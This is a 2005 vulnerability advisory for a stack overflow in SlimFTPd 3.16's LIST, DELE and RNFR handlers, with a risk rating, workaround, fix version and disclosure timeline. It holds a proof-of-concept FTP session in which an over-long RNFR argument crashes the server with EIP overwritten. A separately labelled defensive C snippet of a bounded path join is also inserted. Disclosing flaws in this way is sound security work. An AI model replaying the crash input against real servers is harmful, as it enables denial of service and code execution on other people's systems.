
SlimFTPd316.txt

Posted Jul 22, 2005
Authored by Raphael Rigo

SlimFTPd version 3.16 allows for arbitrary code execution due to an unchecked string concatenation that allows for a classic stack overflow.

tags | advisory, overflow, arbitrary, code execution
SHA-256 | 248142956dd1f27265ceec445dcd2c473686f9c9aab7558319b56e8cc7a709e0

               Arbitrary code execution in SlimFTPd v3.16

discovered by Raphaël Rigo

Product: SlimFTPd by WhitSoft Development
Affected Version: 3.16 (verified), <=3.16 probably too
Not affected Version: 3.17
OS affected: All Win32
Risk: Critical
Remote Exploit: yes
URL: http://www.whitsoftdev.com/slimftpd/

Overview
========

SlimFTPd is a fully standards-compliant FTP server implementation with an
advanced virtual file system. It is extremely small, but don't let its file
size deceive you: SlimFTPd packs a lot of bang for the kilobyte. It is written
in pure Win32 C++ with no external dependencies and no messy installer.
SlimFTPd is a fully multi-threaded application that runs as a system service on
Windows 98/ME or Windows NT/2K/XP, and it comes with a tool to simplify its
installation or uninstallation as a system service. Once the service is
started, SlimFTPd runs quietly in the background. It reads its configuration
from a config file in the same folder as the executable, and it outputs all
activity to a log file in the same place. The virtual file system allows you
to mount any local drive or path to any virtual path on the server. This allows
you to have multiple local drives represented on the server's virtual file
system or just different folders from the same drive. SlimFTPd allows you to
set individual permissions for server paths. Open slimftpd.conf in your
favorite text editor to set up SlimFTPd's configuration. The format of
SlimFTPd's config file is similar to Apache Web Server's for those familiar
with Apache.

Vulnerability
=============

An unchecked string concatenation allows a classic stack overflow.

Details :
The handler for the LIST, DELE and RNFR commands builds a string by
concatenating the current directory with the requested directory or file
name. The requested path and the current directory can each occupy up to
512 bytes, which is also the size of the destination buffer, so their
concatenation can overflow it.
The current remote directory must be at least 8 characters long for the
overflow to be exploitable.
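As an added illustration (not code from the advisory or from SlimFTPd), this is what a bounded path join for the LIST/DELE/RNFR handler looks like: the current directory and the requested name are joined into a 512-byte buffer only after explicit length accounting, so the PoC-sized input (a 10-byte current directory plus a 505-byte name) is rejected instead of overrunning the stack. The buffer size, function names and the 'A'-filled sample names are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define PATH_BUF 512  /* size of the fixed buffer the advisory describes */

/* Bounded path join: cwd + '/' + name into dst, with explicit length
 * accounting instead of strcpy/strcat. Returns 0 on success, -1 if the
 * result plus its NUL terminator would not fit in dstsz bytes. */
static int build_path(char *dst, size_t dstsz, const char *cwd, const char *name)
{
    size_t cl = strlen(cwd), nl = strlen(name);
    size_t sep = (cl == 0 || cwd[cl - 1] != '/') ? 1 : 0;
    if (cl + sep + nl >= dstsz)   /* >= keeps one byte for the NUL */
        return -1;
    memcpy(dst, cwd, cl);
    if (sep)
        dst[cl++] = '/';
    memcpy(dst + cl, name, nl);
    dst[cl + nl] = '\0';
    return 0;
}

/* Simulated RNFR/DELE/LIST handler: 1 = accepted, 0 = rejected as too long. */
static int accept_path(const char *cwd, const char *name)
{
    char path[PATH_BUF];
    return build_path(path, sizeof path, cwd, name) == 0;
}

/* Helper: accept_path with a constructed name of name_len 'A' characters. */
static int accept_path_len(const char *cwd, size_t name_len)
{
    char *name = malloc(name_len + 1);
    int ok;
    if (!name)
        return -1;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    ok = accept_path(cwd, name);
    free(name);
    return ok;
}

int main(void)
{
    printf("/pub + file.txt -> %d\n", accept_path("/pub", "file.txt"));
    printf("/123456789 + 505-byte name -> %d\n", accept_path_len("/123456789", 505));
    return 0;
}
```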

Risk : Critical
The attacker may execute arbitrary code with the privileges of the
user the server is running as.
This risk is mitigated by the need to be logged in.

Proof of concept :
ftp> open localhost
Connected to localhost.
220-SlimFTPd 3.16, by WhitSoft Development (www.whitsoftdev.com)
220-You are connecting from localhost:2687.
220 Proceed with login.
User (localhost:(none)) : bleh
331 Need password for user "bleh".
Password :
230 User "bleh" logged in.
ftp> cd 123456789
250 "/123456789" is now current directory.
ftp> quote RNFR 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345
Connection closed.

SlimFTPd crashes at eip 0x35343332.

Workaround :
Disable List and Write rights.

Solution :
Update to v3.17

-----------------------------------------------------------------------

Acknowledgments
===============

Thanks to the developer for quick response and fix.

Timeline
========
2005-07-07 Discovery
2005-07-08 First attempt to contact developer
2005-07-08 Developer reply
2005-07-11 Fixed version 3.17 released
2005-07-21 Advisory published